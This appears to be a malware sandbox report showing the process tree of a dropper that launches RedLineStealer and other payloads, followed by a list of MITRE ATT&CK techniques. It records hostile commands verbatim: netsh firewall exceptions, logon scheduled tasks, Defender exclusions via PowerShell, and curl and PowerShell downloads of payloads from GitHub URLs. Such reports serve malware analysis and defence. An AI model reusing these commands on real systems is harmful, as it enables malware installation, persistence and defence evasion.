  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1936,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=2068 /prefetch:3
  2⤵
  PID:7984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=2400 /prefetch:8
  2⤵
  PID:4976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:1360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:1688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4492,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4432 /prefetch:1
  2⤵
  PID:7448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3304,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4356 /prefetch:1
  2⤵
  PID:7180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4888,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:7236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4944 /prefetch:8
  2⤵
  PID:7772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5060,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4884 /prefetch:8
  2⤵
  PID:7880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:5836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3328,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4824 /prefetch:8
  2⤵
  PID:6204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3356,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4812 /prefetch:8
  2⤵
  PID:5620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4268,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=4364 /prefetch:8
  2⤵
  PID:7172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4384,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3136 /prefetch:8
  2⤵
  PID:8260
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3384,i,8410252851862195857,7948335577570850741,262144 --variations-seed-version=20250124-050050.337000 --mojo-platform-channel-handle=3516 /prefetch:8
  2⤵
  PID:9796

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:8180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3004 -ip 3004
1⤵
PID:8160

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
PID:6264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4208 -ip 4208
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5740

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:7760
- C:\Users\Admin\Desktop\Files\config.exe
  "C:\Users\Admin\Desktop\Files\config.exe"
  2⤵
  PID:9572

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:4492
- C:\Users\Admin\Desktop\Files\RedLineStealer.exe
  "C:\Users\Admin\Desktop\Files\RedLineStealer.exe"
  2⤵
  PID:7732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8280
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 152
    3⤵
    - Program crash
    PID:8512
- C:\Users\Admin\Desktop\Files\lastest.exe
  "C:\Users\Admin\Desktop\Files\lastest.exe"
  2⤵
  PID:7968
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    PID:8968
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:9632
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM ApplicationFrameHost.exe
      4⤵
      Kills process with taskkill
      PID:9644

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6588
- C:\Users\Admin\Desktop\Files\x.exe
  "C:\Users\Admin\Desktop\Files\x.exe"
  2⤵
  PID:7524
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "x" /sc ONLOGON /tr "C:\Windows\system32\SubDir\x.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:8768
- C:\Users\Admin\Desktop\Files\beacon.exe
  "C:\Users\Admin\Desktop\Files\beacon.exe"
  2⤵
  PID:8720

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:4296
- C:\Users\Admin\Desktop\Files\System.exe
  "C:\Users\Admin\Desktop\Files\System.exe"
  2⤵
  PID:9848
- - C:\Users\Admin\AppData\Roaming\Winrar\System.exe
    "C:\Users\Admin\AppData\Roaming\Winrar\System.exe"
    3⤵
    PID:10228
- C:\Users\Admin\Desktop\Files\kali_tools.exe
  "C:\Users\Admin\Desktop\Files\kali_tools.exe"
  2⤵
  PID:10004

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5164
- C:\Users\Admin\Desktop\Files\artifact.exe
  "C:\Users\Admin\Desktop\Files\artifact.exe"
  2⤵
  PID:8988
- C:\Users\Admin\Desktop\Files\wefhrf.exe
  "C:\Users\Admin\Desktop\Files\wefhrf.exe"
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8416
- C:\Users\Admin\Desktop\Files\testingg.exe
  "C:\Users\Admin\Desktop\Files\testingg.exe"
  2⤵
  PID:9996
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    PID:5332
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:3476
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Modifies Windows Firewall
      PID:8572
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:9580

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:8152
- C:\Users\Admin\Desktop\Files\AutoHotkeyU64.exe
  "C:\Users\Admin\Desktop\Files\AutoHotkeyU64.exe"
  2⤵
  PID:8940
- C:\Users\Admin\Desktop\Files\in.exe
  "C:\Users\Admin\Desktop\Files\in.exe"
  2⤵
  PID:7788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\81EC.tmp\81ED.tmp\81EE.bat C:\Users\Admin\Desktop\Files\in.exe"
    3⤵
    PID:6628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4612
- C:\Users\Admin\Desktop\Files\Java.exe
  "C:\Users\Admin\Desktop\Files\Java.exe"
  2⤵
  PID:6968
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:9896

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:2788
- C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
  "C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
  2⤵
  PID:10036
- - C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe
    "C:\Users\Admin\Desktop\Files\cryptography_module_windows.exe"
    3⤵
    PID:4720
- C:\Users\Admin\Desktop\Files\OGFN%20Updater.exe
  "C:\Users\Admin\Desktop\Files\OGFN%20Updater.exe"
  2⤵
  PID:7920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo off
    3⤵
    PID:7076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:10012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\mapper.exe
    3⤵
    PID:10116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\driver.sys
    3⤵
    PID:6720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareinj.exe
    3⤵
    PID:8364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\injectorold.exe
    3⤵
    PID:9316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareogfn.dll
    3⤵
    PID:9560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent > nul 2>&1
    3⤵
    PID:8912
- C:\Users\Admin\Desktop\Files\center.exe
  "C:\Users\Admin\Desktop\Files\center.exe"
  2⤵
  PID:10084
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
    3⤵
    PID:10200
  - - C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
      "C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
      4⤵
      PID:6956

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:7480

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:7248
- C:\Users\Admin\Desktop\Files\CISNSATEST.exe
  "C:\Users\Admin\Desktop\Files\CISNSATEST.exe"
  2⤵
  PID:8632
- C:\Users\Admin\Desktop\Files\start.exe
  "C:\Users\Admin\Desktop\Files\start.exe"
  2⤵
  PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
    3⤵
    PID:2844
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1310.tmp.bat""
    3⤵
    PID:7888
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:8892

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:7012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7732 -ip 7732
1⤵
PID:8320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 784 -ip 784
1⤵
PID:9160

C:\ProgramData\dllhost.exe
C:\ProgramData\dllhost.exe
1⤵
PID:8520

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:5376

C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
C:\Users\Admin\AppData\Local\Terraria-Multiplayer-Fix-Online.exe
1⤵
PID:1916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 8392 -ip 8392
1⤵
PID:9388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1776 -ip 1776
1⤵
PID:9604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 10052 -ip 10052
1⤵
PID:9384

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery